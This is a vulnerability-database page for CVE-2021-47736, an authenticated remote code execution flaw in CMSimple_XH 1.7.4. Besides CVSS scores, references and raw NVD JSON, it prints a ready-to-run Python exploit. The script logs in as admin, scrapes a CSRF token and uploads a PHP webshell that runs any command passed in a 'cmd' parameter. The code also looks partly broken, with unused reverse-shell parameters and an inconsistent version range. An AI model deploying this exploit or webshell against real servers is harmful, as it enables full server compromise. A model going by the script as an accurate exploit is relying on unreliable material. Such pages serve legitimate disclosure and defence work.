CVE-2021-47736

Description

CMSimple_XH 1.7.4 contains an authenticated remote code execution vulnerability in the content editing functionality that allows administrative users to upload malicious PHP files. Attackers with valid credentials can exploit the CSRF token mechanism to create a PHP shell file that enables arbitrary command execution on the server.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:cmsimple-xh:cmsimple_xh:1.7.4:-:*:*:*:*:*:* - VULNERABLE

CMSimple_XH < 1.7.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import re
import argparse

# CVE-2021-47736 PoC - CMSimple_XH Authenticated RCE
# Target: CMSimple_XH <= 1.7.4
# Vulnerability: Authenticated RCE via content editing functionality

def get_csrf_token(session, target_url):
    """Extract CSRF token from the target page"""
    try:
        response = session.get(target_url + '/?CMSimple_XH=1&admin=plugin_container')
        match = re.search(r'name="_csrf" value="([^"]+)"', response.text)
        if match:
            return match.group(1)
        return None
    except Exception as e:
        print(f"[-] Error fetching CSRF token: {e}")
        return None

def exploit_cmsimple_rce(target_url, username, password, lhost, lport):
    """Exploit the authenticated RCE vulnerability"""
    session = requests.Session()
    
    # Step 1: Login as admin
    login_url = target_url + '/?CMSimple_XH=1&admin=login'
    login_data = {
        'username': username,
        'password': password,
        'login': 'Login'
    }
    
    print("[*] Attempting to login...")
    response = session.post(login_url, data=login_data)
    
    if 'logged_in' not in response.text and response.status_code != 200:
        print("[-] Login failed!")
        return False
    
    print("[+] Login successful!")
    
    # Step 2: Get CSRF token
    csrf_token = get_csrf_token(session, target_url)
    if not csrf_token:
        print("[-] Could not obtain CSRF token")
        return False
    
    print(f"[+] CSRF Token obtained: {csrf_token}")
    
    # Step 3: Upload malicious PHP shell via content editing
    upload_url = target_url + '/?CMSimple_XH=1&admin=plugin_container'
    
    # PHP webshell payload
    php_shell = f"<?php if(isset($_REQUEST['cmd'])){{ $cmd=$_REQUEST['cmd']; system($cmd); }} ?>"
    
    upload_data = {
        '_csrf': csrf_token,
        'action': 'save',
        'text': php_shell,
        'heading': 'test.php'
    }
    
    print("[*] Uploading malicious PHP file...")
    response = session.post(upload_url, data=upload_data)
    
    if response.status_code == 200:
        print("[+] PHP webshell uploaded successfully!")
        print(f"[*] Shell location: {target_url}/test.php")
        print(f"[*] Usage: {target_url}/test.php?cmd=<command>")
        return True
    else:
        print("[-] Failed to upload webshell")
        return False

def main():
    parser = argparse.ArgumentParser(description='CVE-2021-47736 Exploit')
    parser.add_argument('-t', '--target', required=True, help='Target URL')
    parser.add_argument('-u', '--username', required=True, help='Admin username')
    parser.add_argument('-p', '--password', required=True, help='Admin password')
    
    args = parser.parse_args()
    
    exploit_cmsimple_rce(args.target, args.username, args.password, None, None)

if __name__ == '__main__':
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2021-47736
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2021-47736
[3] CVE Details https://www.cvedetails.com/cve/CVE-2021-47736/
[4] VulDB https://vuldb.com/cve/CVE-2021-47736
[5] https://www.cmsimple-xh.org/
[6] https://www.exploit-db.com/exploits/50367
[7] https://www.vulncheck.com/advisories/cmsimplexh-authenticated-remote-code-execution-via-content-editing

Raw JSON Data

JSON

{"cve": {"id": "CVE-2021-47736", "sourceIdentifier": "[email protected]", "published": "2025-12-23T20:15:45.430", "lastModified": "2026-01-05T14:15:51.647", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "CMSimple_XH 1.7.4 contains an authenticated remote code execution vulnerability in the content editing functionality that allows administrative users to upload malicious PHP files. Attackers with valid credentials can exploit the CSRF token mechanism to create a PHP shell file that enables arbitrary command execution on the server."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cmsimple-xh:cmsimple_xh:1.7.4:-:*:*:*:*:*:*", "matchCriteriaId": "935FD8AD-BBA8-45CC-9FE5-064466F62F97"}]}]}], "references": [{"url": "https://www.cmsimple-xh.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/50367", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/cmsimplexh-authenticated-remote-code-execution-via-content-editing", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}